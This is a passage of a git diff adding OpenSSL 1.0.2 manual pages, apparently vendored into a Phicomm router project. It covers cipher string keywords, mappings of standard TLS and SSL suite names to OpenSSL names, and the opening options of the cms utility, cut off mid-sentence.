+this is B<ADH> and B<AECDH>. Note that this rule does not cover B<eNULL>,
+which is not included by B<ALL> (use B<COMPLEMENTOFALL> if necessary).
+
+=item B<ALL>
+
+all cipher suites except the B<eNULL> ciphers which must be explicitly enabled;
+as of OpenSSL, the B<ALL> cipher suites are reasonably ordered by default
+
+=item B<COMPLEMENTOFALL>
+
+the cipher suites not enabled by B<ALL>, currently being B<eNULL>.
+
+=item B<HIGH>
+
+"high" encryption cipher suites. This currently means those with key lengths larger
+than 128 bits, and some cipher suites with 128-bit keys.
+
+=item B<MEDIUM>
+
+"medium" encryption cipher suites, currently some of those using 128 bit encryption.
+
+=item B<LOW>
+
+"low" encryption cipher suites, currently those using 64 or 56 bit encryption algorithms
+but excluding export cipher suites.
+
+=item B<EXP>, B<EXPORT>
+
+export encryption algorithms. Including 40 and 56 bits algorithms.
+
+=item B<EXPORT40>
+
+40 bit export encryption algorithms
+
+=item B<EXPORT56>
+
+56 bit export encryption algorithms. In OpenSSL 0.9.8c and later the set of
+56 bit export ciphers is empty unless OpenSSL has been explicitly configured
+with support for experimental ciphers.
+
+=item B<eNULL>, B<NULL>
+
+the "NULL" ciphers that is those offering no encryption. Because these offer no
+encryption at all and are a security risk they are disabled unless explicitly
+included.
+
+=item B<aNULL>
+
+the cipher suites offering no authentication. This is currently the anonymous
+DH algorithms and anonymous ECDH algorithms. These cipher suites are vulnerable
+to a "man in the middle" attack and so their use is normally discouraged.
+
+=item B<kRSA>, B<RSA>
+
+cipher suites using RSA key exchange.
+
+=item B<kDHr>, B<kDHd>, B<kDH>
+
+cipher suites using DH key agreement and DH certificates signed by CAs with RSA
+and DSS keys or either respectively.
+
+=item B<kDHE>, B<kEDH>
+
+cipher suites using ephemeral DH key agreement, including anonymous cipher
+suites.
+
+=item B<DHE>, B<EDH>
+
+cipher suites using authenticated ephemeral DH key agreement.
+
+=item B<ADH>
+
+anonymous DH cipher suites, note that this does not include anonymous Elliptic
+Curve DH (ECDH) cipher suites.
+
+=item B<DH>
+
+cipher suites using DH, including anonymous DH, ephemeral DH and fixed DH.
+
+=item B<kECDHr>, B<kECDHe>, B<kECDH>
+
+cipher suites using fixed ECDH key agreement signed by CAs with RSA and ECDSA
+keys or either respectively.
+
+=item B<kECDHE>, B<kEECDH>
+
+cipher suites using ephemeral ECDH key agreement, including anonymous
+cipher suites.
+
+=item B<ECDHE>, B<EECDH>
+
+cipher suites using authenticated ephemeral ECDH key agreement.
+
+=item B<AECDH>
+
+anonymous Elliptic Curve Diffie Hellman cipher suites.
+
+=item B<ECDH>
+
+cipher suites using ECDH key exchange, including anonymous, ephemeral and
+fixed ECDH.
+
+=item B<aRSA>
+
+cipher suites using RSA authentication, i.e. the certificates carry RSA keys.
+
+=item B<aDSS>, B<DSS>
+
+cipher suites using DSS authentication, i.e. the certificates carry DSS keys.
+
+=item B<aDH>
+
+cipher suites effectively using DH authentication, i.e. the certificates carry
+DH keys.
+
+=item B<aECDH>
+
+cipher suites effectively using ECDH authentication, i.e. the certificates
+carry ECDH keys.
+
+=item B<aECDSA>, B<ECDSA>
+
+cipher suites using ECDSA authentication, i.e. the certificates carry ECDSA
+keys.
+
+=item B<kFZA>, B<aFZA>, B<eFZA>, B<FZA>
+
+ciphers suites using FORTEZZA key exchange, authentication, encryption or all
+FORTEZZA algorithms. Not implemented.
+
+=item B<TLSv1.2>, B<TLSv1>, B<SSLv3>, B<SSLv2>
+
+TLS v1.2, TLS v1.0, SSL v3.0 or SSL v2.0 cipher suites respectively. Note:
+there are no ciphersuites specific to TLS v1.1.
+
+=item B<AES128>, B<AES256>, B<AES>
+
+cipher suites using 128 bit AES, 256 bit AES or either 128 or 256 bit AES.
+
+=item B<AESGCM>
+
+AES in Galois Counter Mode (GCM): these ciphersuites are only supported
+in TLS v1.2.
+
+=item B<CAMELLIA128>, B<CAMELLIA256>, B<CAMELLIA>
+
+cipher suites using 128 bit CAMELLIA, 256 bit CAMELLIA or either 128 or 256 bit
+CAMELLIA.
+
+=item B<3DES>
+
+cipher suites using triple DES.
+
+=item B<DES>
+
+cipher suites using DES (not triple DES).
+
+=item B<RC4>
+
+cipher suites using RC4.
+
+=item B<RC2>
+
+cipher suites using RC2.
+
+=item B<IDEA>
+
+cipher suites using IDEA.
+
+=item B<SEED>
+
+cipher suites using SEED.
+
+=item B<MD5>
+
+cipher suites using MD5.
+
+=item B<SHA1>, B<SHA>
+
+cipher suites using SHA1.
+
+=item B<SHA256>, B<SHA384>
+
+ciphersuites using SHA256 or SHA384.
+
+=item B<aGOST> 
+
+cipher suites using GOST R 34.10 (either 2001 or 94) for authenticaction
+(needs an engine supporting GOST algorithms). 
+
+=item B<aGOST01>
+
+cipher suites using GOST R 34.10-2001 authentication.
+
+=item B<aGOST94>
+
+cipher suites using GOST R 34.10-94 authentication (note that R 34.10-94
+standard has been expired so use GOST R 34.10-2001)
+
+=item B<kGOST>
+
+cipher suites, using VKO 34.10 key exchange, specified in the RFC 4357.
+
+=item B<GOST94>
+
+cipher suites, using HMAC based on GOST R 34.11-94.
+
+=item B<GOST89MAC>
+
+cipher suites using GOST 28147-89 MAC B<instead of> HMAC.
+
+=item B<PSK>
+
+cipher suites using pre-shared keys (PSK).
+
+=item B<SUITEB128>, B<SUITEB128ONLY>, B<SUITEB192>
+
+enables suite B mode operation using 128 (permitting 192 bit mode by peer)
+128 bit (not permitting 192 bit by peer) or 192 bit level of security
+respectively. If used these cipherstrings should appear first in the cipher
+list and anything after them is ignored. Setting Suite B mode has additional
+consequences required to comply with RFC6460. In particular the supported
+signature algorithms is reduced to support only ECDSA and SHA256 or SHA384,
+only the elliptic curves P-256 and P-384 can be used and only the two suite B
+compliant ciphersuites (ECDHE-ECDSA-AES128-GCM-SHA256 and
+ECDHE-ECDSA-AES256-GCM-SHA384) are permissible.
+
+=back
+
+=head1 CIPHER SUITE NAMES
+
+The following lists give the SSL or TLS cipher suites names from the
+relevant specification and their OpenSSL equivalents. It should be noted,
+that several cipher suite names do not include the authentication used,
+e.g. DES-CBC3-SHA. In these cases, RSA authentication is used.
+
+=head2 SSL v3.0 cipher suites.
+
+ SSL_RSA_WITH_NULL_MD5                   NULL-MD5
+ SSL_RSA_WITH_NULL_SHA                   NULL-SHA
+ SSL_RSA_EXPORT_WITH_RC4_40_MD5          EXP-RC4-MD5
+ SSL_RSA_WITH_RC4_128_MD5                RC4-MD5
+ SSL_RSA_WITH_RC4_128_SHA                RC4-SHA
+ SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5      EXP-RC2-CBC-MD5
+ SSL_RSA_WITH_IDEA_CBC_SHA               IDEA-CBC-SHA
+ SSL_RSA_EXPORT_WITH_DES40_CBC_SHA       EXP-DES-CBC-SHA
+ SSL_RSA_WITH_DES_CBC_SHA                DES-CBC-SHA
+ SSL_RSA_WITH_3DES_EDE_CBC_SHA           DES-CBC3-SHA
+
+ SSL_DH_DSS_EXPORT_WITH_DES40_CBC_SHA    EXP-DH-DSS-DES-CBC-SHA
+ SSL_DH_DSS_WITH_DES_CBC_SHA             DH-DSS-DES-CBC-SHA
+ SSL_DH_DSS_WITH_3DES_EDE_CBC_SHA        DH-DSS-DES-CBC3-SHA
+ SSL_DH_RSA_EXPORT_WITH_DES40_CBC_SHA    EXP-DH-RSA-DES-CBC-SHA
+ SSL_DH_RSA_WITH_DES_CBC_SHA             DH-RSA-DES-CBC-SHA
+ SSL_DH_RSA_WITH_3DES_EDE_CBC_SHA        DH-RSA-DES-CBC3-SHA
+ SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA   EXP-EDH-DSS-DES-CBC-SHA
+ SSL_DHE_DSS_WITH_DES_CBC_SHA            EDH-DSS-CBC-SHA
+ SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA       EDH-DSS-DES-CBC3-SHA
+ SSL_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA   EXP-EDH-RSA-DES-CBC-SHA
+ SSL_DHE_RSA_WITH_DES_CBC_SHA            EDH-RSA-DES-CBC-SHA
+ SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA       EDH-RSA-DES-CBC3-SHA
+
+ SSL_DH_anon_EXPORT_WITH_RC4_40_MD5      EXP-ADH-RC4-MD5
+ SSL_DH_anon_WITH_RC4_128_MD5            ADH-RC4-MD5
+ SSL_DH_anon_EXPORT_WITH_DES40_CBC_SHA   EXP-ADH-DES-CBC-SHA
+ SSL_DH_anon_WITH_DES_CBC_SHA            ADH-DES-CBC-SHA
+ SSL_DH_anon_WITH_3DES_EDE_CBC_SHA       ADH-DES-CBC3-SHA
+
+ SSL_FORTEZZA_KEA_WITH_NULL_SHA          Not implemented.
+ SSL_FORTEZZA_KEA_WITH_FORTEZZA_CBC_SHA  Not implemented.
+ SSL_FORTEZZA_KEA_WITH_RC4_128_SHA       Not implemented.
+
+=head2 TLS v1.0 cipher suites.
+
+ TLS_RSA_WITH_NULL_MD5                   NULL-MD5
+ TLS_RSA_WITH_NULL_SHA                   NULL-SHA
+ TLS_RSA_EXPORT_WITH_RC4_40_MD5          EXP-RC4-MD5
+ TLS_RSA_WITH_RC4_128_MD5                RC4-MD5
+ TLS_RSA_WITH_RC4_128_SHA                RC4-SHA
+ TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5      EXP-RC2-CBC-MD5
+ TLS_RSA_WITH_IDEA_CBC_SHA               IDEA-CBC-SHA
+ TLS_RSA_EXPORT_WITH_DES40_CBC_SHA       EXP-DES-CBC-SHA
+ TLS_RSA_WITH_DES_CBC_SHA                DES-CBC-SHA
+ TLS_RSA_WITH_3DES_EDE_CBC_SHA           DES-CBC3-SHA
+
+ TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA    Not implemented.
+ TLS_DH_DSS_WITH_DES_CBC_SHA             Not implemented.
+ TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA        Not implemented.
+ TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA    Not implemented.
+ TLS_DH_RSA_WITH_DES_CBC_SHA             Not implemented.
+ TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA        Not implemented.
+ TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA   EXP-EDH-DSS-DES-CBC-SHA
+ TLS_DHE_DSS_WITH_DES_CBC_SHA            EDH-DSS-CBC-SHA
+ TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA       EDH-DSS-DES-CBC3-SHA
+ TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA   EXP-EDH-RSA-DES-CBC-SHA
+ TLS_DHE_RSA_WITH_DES_CBC_SHA            EDH-RSA-DES-CBC-SHA
+ TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA       EDH-RSA-DES-CBC3-SHA
+
+ TLS_DH_anon_EXPORT_WITH_RC4_40_MD5      EXP-ADH-RC4-MD5
+ TLS_DH_anon_WITH_RC4_128_MD5            ADH-RC4-MD5
+ TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA   EXP-ADH-DES-CBC-SHA
+ TLS_DH_anon_WITH_DES_CBC_SHA            ADH-DES-CBC-SHA
+ TLS_DH_anon_WITH_3DES_EDE_CBC_SHA       ADH-DES-CBC3-SHA
+
+=head2 AES ciphersuites from RFC3268, extending TLS v1.0
+
+ TLS_RSA_WITH_AES_128_CBC_SHA            AES128-SHA
+ TLS_RSA_WITH_AES_256_CBC_SHA            AES256-SHA
+
+ TLS_DH_DSS_WITH_AES_128_CBC_SHA         DH-DSS-AES128-SHA
+ TLS_DH_DSS_WITH_AES_256_CBC_SHA         DH-DSS-AES256-SHA
+ TLS_DH_RSA_WITH_AES_128_CBC_SHA         DH-RSA-AES128-SHA
+ TLS_DH_RSA_WITH_AES_256_CBC_SHA         DH-RSA-AES256-SHA
+
+ TLS_DHE_DSS_WITH_AES_128_CBC_SHA        DHE-DSS-AES128-SHA
+ TLS_DHE_DSS_WITH_AES_256_CBC_SHA        DHE-DSS-AES256-SHA
+ TLS_DHE_RSA_WITH_AES_128_CBC_SHA        DHE-RSA-AES128-SHA
+ TLS_DHE_RSA_WITH_AES_256_CBC_SHA        DHE-RSA-AES256-SHA
+
+ TLS_DH_anon_WITH_AES_128_CBC_SHA        ADH-AES128-SHA
+ TLS_DH_anon_WITH_AES_256_CBC_SHA        ADH-AES256-SHA
+
+=head2 Camellia ciphersuites from RFC4132, extending TLS v1.0
+
+ TLS_RSA_WITH_CAMELLIA_128_CBC_SHA      CAMELLIA128-SHA
+ TLS_RSA_WITH_CAMELLIA_256_CBC_SHA      CAMELLIA256-SHA
+
+ TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA   DH-DSS-CAMELLIA128-SHA
+ TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA   DH-DSS-CAMELLIA256-SHA
+ TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA   DH-RSA-CAMELLIA128-SHA
+ TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA   DH-RSA-CAMELLIA256-SHA
+
+ TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA  DHE-DSS-CAMELLIA128-SHA
+ TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA  DHE-DSS-CAMELLIA256-SHA
+ TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA  DHE-RSA-CAMELLIA128-SHA
+ TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA  DHE-RSA-CAMELLIA256-SHA
+
+ TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA  ADH-CAMELLIA128-SHA
+ TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA  ADH-CAMELLIA256-SHA
+
+=head2 SEED ciphersuites from RFC4162, extending TLS v1.0
+
+ TLS_RSA_WITH_SEED_CBC_SHA              SEED-SHA
+
+ TLS_DH_DSS_WITH_SEED_CBC_SHA           DH-DSS-SEED-SHA
+ TLS_DH_RSA_WITH_SEED_CBC_SHA           DH-RSA-SEED-SHA
+
+ TLS_DHE_DSS_WITH_SEED_CBC_SHA          DHE-DSS-SEED-SHA
+ TLS_DHE_RSA_WITH_SEED_CBC_SHA          DHE-RSA-SEED-SHA
+
+ TLS_DH_anon_WITH_SEED_CBC_SHA          ADH-SEED-SHA
+
+=head2 GOST ciphersuites from draft-chudov-cryptopro-cptls, extending TLS v1.0
+
+Note: these ciphers require an engine which including GOST cryptographic
+algorithms, such as the B<ccgost> engine, included in the OpenSSL distribution.
+
+ TLS_GOSTR341094_WITH_28147_CNT_IMIT GOST94-GOST89-GOST89
+ TLS_GOSTR341001_WITH_28147_CNT_IMIT GOST2001-GOST89-GOST89
+ TLS_GOSTR341094_WITH_NULL_GOSTR3411 GOST94-NULL-GOST94
+ TLS_GOSTR341001_WITH_NULL_GOSTR3411 GOST2001-NULL-GOST94
+
+=head2 Additional Export 1024 and other cipher suites
+
+Note: these ciphers can also be used in SSL v3.
+
+ TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA     EXP1024-DES-CBC-SHA
+ TLS_RSA_EXPORT1024_WITH_RC4_56_SHA      EXP1024-RC4-SHA
+ TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA EXP1024-DHE-DSS-DES-CBC-SHA
+ TLS_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA  EXP1024-DHE-DSS-RC4-SHA
+ TLS_DHE_DSS_WITH_RC4_128_SHA            DHE-DSS-RC4-SHA
+
+=head2 Elliptic curve cipher suites.
+
+ TLS_ECDH_RSA_WITH_NULL_SHA              ECDH-RSA-NULL-SHA
+ TLS_ECDH_RSA_WITH_RC4_128_SHA           ECDH-RSA-RC4-SHA
+ TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA      ECDH-RSA-DES-CBC3-SHA
+ TLS_ECDH_RSA_WITH_AES_128_CBC_SHA       ECDH-RSA-AES128-SHA
+ TLS_ECDH_RSA_WITH_AES_256_CBC_SHA       ECDH-RSA-AES256-SHA
+
+ TLS_ECDH_ECDSA_WITH_NULL_SHA            ECDH-ECDSA-NULL-SHA
+ TLS_ECDH_ECDSA_WITH_RC4_128_SHA         ECDH-ECDSA-RC4-SHA
+ TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA    ECDH-ECDSA-DES-CBC3-SHA
+ TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA     ECDH-ECDSA-AES128-SHA
+ TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA     ECDH-ECDSA-AES256-SHA
+
+ TLS_ECDHE_RSA_WITH_NULL_SHA             ECDHE-RSA-NULL-SHA
+ TLS_ECDHE_RSA_WITH_RC4_128_SHA          ECDHE-RSA-RC4-SHA
+ TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA     ECDHE-RSA-DES-CBC3-SHA
+ TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA      ECDHE-RSA-AES128-SHA
+ TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA      ECDHE-RSA-AES256-SHA
+
+ TLS_ECDHE_ECDSA_WITH_NULL_SHA           ECDHE-ECDSA-NULL-SHA
+ TLS_ECDHE_ECDSA_WITH_RC4_128_SHA        ECDHE-ECDSA-RC4-SHA
+ TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA   ECDHE-ECDSA-DES-CBC3-SHA
+ TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA    ECDHE-ECDSA-AES128-SHA
+ TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA    ECDHE-ECDSA-AES256-SHA
+
+ TLS_ECDH_anon_WITH_NULL_SHA             AECDH-NULL-SHA
+ TLS_ECDH_anon_WITH_RC4_128_SHA          AECDH-RC4-SHA
+ TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA     AECDH-DES-CBC3-SHA
+ TLS_ECDH_anon_WITH_AES_128_CBC_SHA      AECDH-AES128-SHA
+ TLS_ECDH_anon_WITH_AES_256_CBC_SHA      AECDH-AES256-SHA
+
+=head2 TLS v1.2 cipher suites
+
+ TLS_RSA_WITH_NULL_SHA256                  NULL-SHA256
+
+ TLS_RSA_WITH_AES_128_CBC_SHA256           AES128-SHA256
+ TLS_RSA_WITH_AES_256_CBC_SHA256           AES256-SHA256
+ TLS_RSA_WITH_AES_128_GCM_SHA256           AES128-GCM-SHA256
+ TLS_RSA_WITH_AES_256_GCM_SHA384           AES256-GCM-SHA384
+
+ TLS_DH_RSA_WITH_AES_128_CBC_SHA256        DH-RSA-AES128-SHA256
+ TLS_DH_RSA_WITH_AES_256_CBC_SHA256        DH-RSA-AES256-SHA256
+ TLS_DH_RSA_WITH_AES_128_GCM_SHA256        DH-RSA-AES128-GCM-SHA256
+ TLS_DH_RSA_WITH_AES_256_GCM_SHA384        DH-RSA-AES256-GCM-SHA384
+
+ TLS_DH_DSS_WITH_AES_128_CBC_SHA256        DH-DSS-AES128-SHA256
+ TLS_DH_DSS_WITH_AES_256_CBC_SHA256        DH-DSS-AES256-SHA256
+ TLS_DH_DSS_WITH_AES_128_GCM_SHA256        DH-DSS-AES128-GCM-SHA256
+ TLS_DH_DSS_WITH_AES_256_GCM_SHA384        DH-DSS-AES256-GCM-SHA384
+
+ TLS_DHE_RSA_WITH_AES_128_CBC_SHA256       DHE-RSA-AES128-SHA256
+ TLS_DHE_RSA_WITH_AES_256_CBC_SHA256       DHE-RSA-AES256-SHA256
+ TLS_DHE_RSA_WITH_AES_128_GCM_SHA256       DHE-RSA-AES128-GCM-SHA256
+ TLS_DHE_RSA_WITH_AES_256_GCM_SHA384       DHE-RSA-AES256-GCM-SHA384
+
+ TLS_DHE_DSS_WITH_AES_128_CBC_SHA256       DHE-DSS-AES128-SHA256
+ TLS_DHE_DSS_WITH_AES_256_CBC_SHA256       DHE-DSS-AES256-SHA256
+ TLS_DHE_DSS_WITH_AES_128_GCM_SHA256       DHE-DSS-AES128-GCM-SHA256
+ TLS_DHE_DSS_WITH_AES_256_GCM_SHA384       DHE-DSS-AES256-GCM-SHA384
+
+ TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256      ECDH-RSA-AES128-SHA256
+ TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384      ECDH-RSA-AES256-SHA384
+ TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256      ECDH-RSA-AES128-GCM-SHA256
+ TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384      ECDH-RSA-AES256-GCM-SHA384
+
+ TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256    ECDH-ECDSA-AES128-SHA256
+ TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384    ECDH-ECDSA-AES256-SHA384
+ TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256    ECDH-ECDSA-AES128-GCM-SHA256
+ TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384    ECDH-ECDSA-AES256-GCM-SHA384
+
+ TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256     ECDHE-RSA-AES128-SHA256
+ TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384     ECDHE-RSA-AES256-SHA384
+ TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256     ECDHE-RSA-AES128-GCM-SHA256
+ TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384     ECDHE-RSA-AES256-GCM-SHA384
+
+ TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256   ECDHE-ECDSA-AES128-SHA256
+ TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384   ECDHE-ECDSA-AES256-SHA384
+ TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256   ECDHE-ECDSA-AES128-GCM-SHA256
+ TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384   ECDHE-ECDSA-AES256-GCM-SHA384
+
+ TLS_DH_anon_WITH_AES_128_CBC_SHA256       ADH-AES128-SHA256
+ TLS_DH_anon_WITH_AES_256_CBC_SHA256       ADH-AES256-SHA256
+ TLS_DH_anon_WITH_AES_128_GCM_SHA256       ADH-AES128-GCM-SHA256
+ TLS_DH_anon_WITH_AES_256_GCM_SHA384       ADH-AES256-GCM-SHA384
+
+=head2 Pre shared keying (PSK) cipheruites
+
+ TLS_PSK_WITH_RC4_128_SHA                  PSK-RC4-SHA
+ TLS_PSK_WITH_3DES_EDE_CBC_SHA             PSK-3DES-EDE-CBC-SHA
+ TLS_PSK_WITH_AES_128_CBC_SHA              PSK-AES128-CBC-SHA
+ TLS_PSK_WITH_AES_256_CBC_SHA              PSK-AES256-CBC-SHA
+
+=head2 Deprecated SSL v2.0 cipher suites.
+
+ SSL_CK_RC4_128_WITH_MD5                 RC4-MD5
+ SSL_CK_RC4_128_EXPORT40_WITH_MD5        EXP-RC4-MD5
+ SSL_CK_RC2_128_CBC_WITH_MD5             RC2-MD5
+ SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5    EXP-RC2-MD5
+ SSL_CK_IDEA_128_CBC_WITH_MD5            IDEA-CBC-MD5
+ SSL_CK_DES_64_CBC_WITH_MD5              DES-CBC-MD5
+ SSL_CK_DES_192_EDE3_CBC_WITH_MD5        DES-CBC3-MD5
+
+=head1 NOTES
+
+Some compiled versions of OpenSSL may not include all the ciphers
+listed here because some ciphers were excluded at compile time.
+
+=head1 EXAMPLES
+
+Verbose listing of all OpenSSL ciphers including NULL ciphers:
+
+ openssl ciphers -v 'ALL:eNULL'
+
+Include all ciphers except NULL and anonymous DH then sort by
+strength:
+
+ openssl ciphers -v 'ALL:!ADH:@STRENGTH'
+
+Include all ciphers except ones with no encryption (eNULL) or no
+authentication (aNULL):
+
+ openssl ciphers -v 'ALL:!aNULL'
+
+Include only 3DES ciphers and then place RSA ciphers last:
+
+ openssl ciphers -v '3DES:+RSA'
+
+Include all RC4 ciphers but leave out those without authentication:
+
+ openssl ciphers -v 'RC4:!COMPLEMENTOFDEFAULT'
+
+Include all chiphers with RSA authentication but leave out ciphers without
+encryption.
+
+ openssl ciphers -v 'RSA:!COMPLEMENTOFALL'
+
+=head1 SEE ALSO
+
+L<s_client(1)|s_client(1)>, L<s_server(1)|s_server(1)>, L<ssl(3)|ssl(3)>
+
+=head1 HISTORY
+
+The B<COMPLENTOFALL> and B<COMPLEMENTOFDEFAULT> selection options
+for cipherlist strings were added in OpenSSL 0.9.7.
+The B<-V> option for the B<ciphers> command was added in OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/cms.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/cms.pod
new file mode 100644
index 0000000..76dbf2c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/cms.pod
@@ -0,0 +1,658 @@
+=pod
+
+=head1 NAME
+
+cms - CMS utility
+
+=head1 SYNOPSIS
+
+B<openssl> B<cms>
+[B<-encrypt>]
+[B<-decrypt>]
+[B<-sign>]
+[B<-verify>]
+[B<-cmsout>]
+[B<-resign>]
+[B<-data_create>]
+[B<-data_out>]
+[B<-digest_create>]
+[B<-digest_verify>]
+[B<-compress>]
+[B<-uncompress>]
+[B<-EncryptedData_encrypt>]
+[B<-sign_receipt>]
+[B<-verify_receipt receipt>]
+[B<-in filename>]
+[B<-inform SMIME|PEM|DER>]
+[B<-rctform SMIME|PEM|DER>]
+[B<-out filename>]
+[B<-outform SMIME|PEM|DER>]
+[B<-stream -indef -noindef>]
+[B<-noindef>]
+[B<-content filename>]
+[B<-text>]
+[B<-noout>]
+[B<-print>]
+[B<-CAfile file>]
+[B<-CApath dir>]
+[B<-md digest>]
+[B<-[cipher]>]
+[B<-nointern>]
+[B<-no_signer_cert_verify>]
+[B<-nocerts>]
+[B<-noattr>]
+[B<-nosmimecap>]
+[B<-binary>]
+[B<-nodetach>]
+[B<-certfile file>]
+[B<-certsout file>]
+[B<-signer file>]
+[B<-recip file>]
+[B<-keyid>]
+[B<-receipt_request_all -receipt_request_first>]
+[B<-receipt_request_from emailaddress>]
+[B<-receipt_request_to emailaddress>]
+[B<-receipt_request_print>]
+[B<-secretkey key>]
+[B<-secretkeyid id>]
+[B<-econtent_type type>]
+[B<-inkey file>]
+[B<-keyopt name:parameter>]
+[B<-passin arg>]
+[B<-rand file(s)>]
+[B<cert.pem...>]
+[B<-to addr>]
+[B<-from addr>]
+[B<-subject subj>]
+[cert.pem]...
+
+=head1 DESCRIPTION
+
+The B<cms> command handles S/MIME v3.1 mail. It can encrypt, decrypt, sign and
+verify, compress and uncompress S/MIME messages.
+
+=head1 COMMAND OPTIONS
+
+There are fourteen operation options that set the type of operation to be
+performed. The meaning of the other options varies according to the operation
+type.
+
+=over 4
+
+=item B<-encrypt>
+
+encrypt mail for the given recipient certificates. Input file is the message
+to be encrypted. The output file is the encrypted mail in MIME format. The
+actual CMS type is <B>EnvelopedData<B>.
+
+=item B<-decrypt>
+
+decrypt mail using the supplied certificate and private key. Expects an
+encrypted mail message in MIME format for the input file. The decrypted mail
+is written to the output file.
+
+=item B<-debug_decrypt>
+
+this option sets the B<CMS_DEBUG_DECRYPT> flag. This option should be used
+with caution: see the notes section below.
+
+=item B<-sign>
+
+sign mail using the supplied certificate and private key. Input file is
+the message to be signed. The signed message in MIME format is written
+to the output file.
+
+=item B<-verify>
+
+verify signed mail. Expects a signed mail message on input and outputs
+the signed data. Both clear text and opaque signing is supported.
+
+=item B<-cmsout>
+
+takes an input message and writes out a PEM encoded CMS structure.
+
+=item B<-resign>
+
+resign a message: take an existing message and one or more new signers.
+
+=item B<-data_create>
+
+Create a CMS B<Data> type.
+
+=item B<-data_out>
+
+B<Data> type and output the content.
+
+=item B<-digest_create>
+
+Create a CMS B<DigestedData> type.
+
+=item B<-digest_verify>
+
+Verify a CMS B<DigestedData> type and output the content.
+
+=item B<-compress>
+
+Create a CMS B<CompressedData> type. OpenSSL must be compiled with B<zlib>
+support for this option to work, otherwise it will output an error.
+
+=item B<-uncompress>
+
+Uncompress a CMS B<CompressedData> type and output the content. OpenSSL must be
+compiled with B<zlib> support for this option to work, otherwise it will
+output an error.
+
+=item B<-EncryptedData_encrypt>
+
+Encrypt content using supplied symmetric key and algorithm using a CMS
+B<EncrytedData> type and output the content.
+
+=item B<-sign_receipt>
+
+Generate and output a signed receipt for the supplied message. The input 
+message B<must> contain a signed receipt request. Functionality is otherwise
+similar to the B<-sign> operation.
+
+=item B<-verify_receipt receipt>
+
+Verify a signed receipt in filename B<receipt>. The input message B<must> 
+contain the original receipt request. Functionality is otherwise similar
+to the B<-verify> operation.
+
+=item B<-in filename>
+
+the input message to be encrypted or signed or the message to be decrypted
+or verified.
+
+=item B<-inform SMIME|PEM|DER>
+
+this specifies the input format for the CMS structure. The default
+is B<SMIME> which reads an S/MIME format message. B<PEM> and B<DER>
+format change this to expect PEM and DER format CMS structures
+instead. This currently only affects the input format of the CMS
+structure, if no CMS structure is being input (for example with
+B<-encrypt> or B<-sign>) this option has no effect.
+
+=item B<-rctform SMIME|PEM|DER>
+
+specify the format for a signed receipt for use with the B<-receipt_verify>
+operation.
+
+=item B<-out filename>
+
+the message text that has been decrypted or verified or the output MIME
+format message that has been signed or verified.
+
+=item B<-outform SMIME|PEM|DER>
+
+this specifies the output format for the CMS structure. The default
+is B<SMIME> which writes an S/MIME format message. B<PEM> and B<DER>
+format change this to write PEM and DER format CMS structures
+instead. This currently only affects the output format of the CMS
+structure, if no CMS structure is being output (for example with
+B<-verify> or B<-decrypt>) this option has no effect.
+
+=item B<-stream -indef -noindef>
+
+the B<-stream> and B<-indef> options are equivalent and enable streaming I/O
+for encoding operations. This permits single pass processing of data without
+the need to hold the entire contents in memory, potentially supporting very
